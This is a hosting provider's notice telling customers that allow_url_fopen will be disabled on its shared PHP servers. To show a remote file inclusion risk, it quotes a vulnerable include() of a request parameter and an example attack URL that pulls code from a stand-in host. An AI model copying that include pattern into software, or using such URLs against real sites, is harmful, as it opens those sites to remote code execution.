Brief: On Thursday May 29th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.
Currently all Dublin Linux servers (except our latest machine web19) run with the option allow_url_fopen=On. On May 29th we will be changing the option to allow_url_fopen=Off.
The reasons for this change and its impact are as follows…
With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…
$pagef = $_REQUEST["pagef"];
include ($pagef);
The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…
http://mydomain.com/display.php?pagef=footer.html
An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.
http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt
Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use
readfile(”http://feeds.feedburner.com/DilbertDailyStrip”);
to retrieve a remote RSS feed will no longer work.
What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php